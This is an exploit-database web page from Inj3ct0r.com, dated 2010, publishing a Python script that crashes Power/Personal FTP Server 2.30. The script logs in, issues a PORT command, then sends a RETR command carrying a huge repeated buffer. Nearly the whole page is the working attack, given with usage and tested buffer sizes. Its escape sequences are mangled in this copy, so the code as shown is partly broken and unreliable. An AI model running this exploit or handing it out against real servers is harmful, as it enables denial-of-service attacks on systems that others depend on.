<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Power/Personat FTP 2.30 Server RETR Command DoS</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Power/Personat FTP 2.30 Server RETR Command DoS
===============================================

#!/usr/bin/python

#——————————————–
# Power/Personal FTP Server RETR Command DoS
#——————————————–

# Title: Power/Personat FTP Server RETR Command DoS
# Author: antrhacks
# Specifically for Inj3ct0r.com (Exploit DataBase)
# Software Link: http://www.cooolsoft.com/download/PowerFTP.EXE
# Version: 2.30
# Platform: Windows XP SP3 Home edition Fr
# Tested with buffersize: 82000, 83000, 84000, … 92000
# Example: ./PowerFTP.py 192.168.0.10 test test 85000

import socket
import sys

# Description:
# RETR command overflow with PORT specified

def howto():
print (&quot;Usage: scriptname.py &lt;IP&gt; &lt;username&gt; &lt;password&gt; &lt;buffersize&gt;n&quot;)

def exploit(host,user,password):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((‘0.0.0.0′, 6666)) # Need that for the PORT Command !!!
try:
sock.connect((host, 21))
except:
print (&quot;Unable to connect to host&quot;)
sys.exit(1)
r=sock.recv(1024)
print r
r=sock.getsockname()
print r
sock.send(&quot;USER &quot; + user + &quot;rn&quot;)
r=sock.recv(1024)
print r
sock.send(&quot;PASS &quot; + password + &quot;rn&quot;)
r=sock.recv(1024)
print r
sock.send(&quot;PORT 192,168,0,11,26,10&quot; + &quot;rn&quot;) # 26,10 =&gt; 0×1a,0×0a =&gt; 6666
r=sock.recv(1024)
print r
sock.send(&quot;RETR &quot; + buffer + &quot; rn&quot;)
r=sock.recv(1024)
print r
sock.send(&quot;QUIT&quot; + &quot; rn&quot;)
r=sock.recv(1024)
print r
sock.close()

if len(sys.argv) &lt;&gt; 5:
howto()
sys.exit(1)
else:
host=sys.argv[1]
user=sys.argv[2]
password=sys.argv[3]
buffersize=int(sys.argv[4])
buffer=&quot;x0ax0a&quot; * buffersize
exploit(host,user,password)
sys.exit(0)

# END

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-15]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13340